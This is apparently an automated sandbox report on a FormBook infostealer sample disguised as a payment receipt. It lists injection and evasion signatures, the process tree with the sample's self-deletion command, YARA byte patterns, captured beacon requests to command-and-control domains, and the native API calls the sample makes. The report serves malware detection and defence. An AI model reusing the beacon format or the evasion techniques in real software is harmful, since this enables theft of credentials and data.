Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Final-Payment-Receipt.exe

Overview

General Information

Sample Name:Final-Payment-Receipt.exe
Analysis ID:320833
MD5:8f5d29001a9f5d4f62b47af6442be5ab
SHA1:4838464ffe421aad7c9d73ba19420b7e9c2c427d
SHA256:8e01fb320ffa60c0157bfc9aa8c6de43a7802d7f408de907a0d6338ce25c239c
Tags:exe

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Final-Payment-Receipt.exe (PID: 1692 cmdline: 'C:\Users\user\Desktop\Final-Payment-Receipt.exe' MD5: 8F5D29001A9F5D4F62B47AF6442BE5AB)
    • Final-Payment-Receipt.exe (PID: 5764 cmdline: C:\Users\user\Desktop\Final-Payment-Receipt.exe MD5: 8F5D29001A9F5D4F62B47AF6442BE5AB)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 4732 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 5932 cmdline: /c del 'C:\Users\user\Desktop\Final-Payment-Receipt.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b337:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c33a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18419:$sqlite3step: 68 34 1C 7B E1
    • 0x1852c:$sqlite3step: 68 34 1C 7B E1
    • 0x18448:$sqlite3text: 68 38 2A 90 C5
    • 0x1856d:$sqlite3text: 68 38 2A 90 C5
    • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b337:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c33a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.Final-Payment-Receipt.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.Final-Payment-Receipt.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a537:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b53a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.Final-Payment-Receipt.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17619:$sqlite3step: 68 34 1C 7B E1
        • 0x1772c:$sqlite3step: 68 34 1C 7B E1
        • 0x17648:$sqlite3text: 68 38 2A 90 C5
        • 0x1776d:$sqlite3text: 68 38 2A 90 C5
        • 0x1765b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17783:$sqlite3blob: 68 53 D8 7F 8C
        1.2.Final-Payment-Receipt.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.Final-Payment-Receipt.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b337:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c33a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for submitted fileShow sources
          Source: Final-Payment-Receipt.exeReversingLabs: Detection: 34%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: Final-Payment-Receipt.exeJoe Sandbox ML: detected
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: global trafficHTTP traffic detected: GET /71m/?Rzr0iD=xuMbXRqvcjTkPYem20N3vsgWyUob49TNzNry+QjPYNTyHJJexkEaphWMorU+NKluO0/a&ZL3=rVvxt090-21lhr HTTP/1.1Host: www.wacrox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /71m/?Rzr0iD=gir/TGf45q640hyvaYoOLmcQvbxfbyF+CK0IasCqTcsJdBCY+OvZ/ZhMnEHJcPXMDgdk&ZL3=rVvxt090-21lhr HTTP/1.1Host: www.trumpingitagain.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /71m/?Rzr0iD=rhJBnfA/e5RktQ98+ow2gk+rbfXq49mIcD+nNtl3IG/t9WffOOBTTAV63Ad5zEG8kC/4&ZL3=rVvxt090-21lhr HTTP/1.1Host: www.themindofafunnygirl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU
          Source: Joe Sandbox ViewASN Name: AUTOMATTICUS AUTOMATTICUS
          Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
          Source: global trafficHTTP traffic detected: GET /71m/?Rzr0iD=xuMbXRqvcjTkPYem20N3vsgWyUob49TNzNry+QjPYNTyHJJexkEaphWMorU+NKluO0/a&ZL3=rVvxt090-21lhr HTTP/1.1Host: www.wacrox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /71m/?Rzr0iD=gir/TGf45q640hyvaYoOLmcQvbxfbyF+CK0IasCqTcsJdBCY+OvZ/ZhMnEHJcPXMDgdk&ZL3=rVvxt090-21lhr HTTP/1.1Host: www.trumpingitagain.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /71m/?Rzr0iD=rhJBnfA/e5RktQ98+ow2gk+rbfXq49mIcD+nNtl3IG/t9WffOOBTTAV63Ad5zEG8kC/4&ZL3=rVvxt090-21lhr HTTP/1.1Host: www.themindofafunnygirl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: g.msn.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Nov 2020 21:20:27 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 327Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 37 31 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /71m/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: Final-Payment-Receipt.exe, 00000000.00000002.232733869.00000000023B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: wlanext.exe, 00000003.00000002.492344982.00000000041AF000.00000004.00000001.sdmpString found in binary or memory: https://themindofafunnygirl.com/71m/?Rzr0iD=rhJBnfA/e5RktQ98

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: Final-Payment-Receipt.exe
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419D70 NtCreateFile,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419E20 NtReadFile,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419EA0 NtClose,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419F50 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419DC2 NtCreateFile,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419E1F NtReadFile,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00419F4C NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013FB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013FA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013FAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9560 NtWriteFile,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013FA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013FA770 NtOpenThread,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F96D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_03759650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 3_2_037596D0 NtCreateKey,LdrInitializeThunk,
